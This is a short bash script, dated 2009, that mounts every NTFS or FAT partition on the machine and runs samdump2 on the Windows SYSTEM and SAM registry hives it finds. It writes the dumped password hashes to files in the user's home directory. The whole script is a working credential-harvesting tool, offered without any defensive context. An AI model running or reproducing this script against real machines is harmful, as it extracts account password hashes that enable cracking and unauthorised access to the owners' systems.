#!/bin/bash
# TODO: Figure out more intelligent umount command
# Copyleft 2009 jensp <jens@jenux.homelinux.org> All Rites Reversed
get_devices() {
	sudo /sbin/fdisk -l |grep -e '^/' |awk '{print $1}'|sed -e "s|/dev/||g"
}
dump_sam() {
	shopt -s nocaseglob
	samdump2 -o ~/dump-$1 /mnt/$1/windows*/system32*/config*/syste[m] /mnt/$1/windows*/system32*/config*/sa[m]
}
for partition in $(get_devices)
do
	sudo mkdir -p /mnt/$partition
	if sudo mount -t ntfs-3g /dev/$partition /mnt/$partition 2>/dev/null
	then
		dump_sam $partition && echo "sam dumped to $HOME/dump-$partition"
		sleep 5 && sudo umount /mnt/$partition && sudo rmdir /mnt/$partition
	elif sudo mount -t vfat /dev/$partition /mnt/$partition 2>/dev/null
	then
		dump_sam $partition && echo "sam dumped to $HOME/dump-$partition"
		sleep 5 && sudo umount /mnt/$partition && sudo rmdir /mnt/$partition
	fi
done
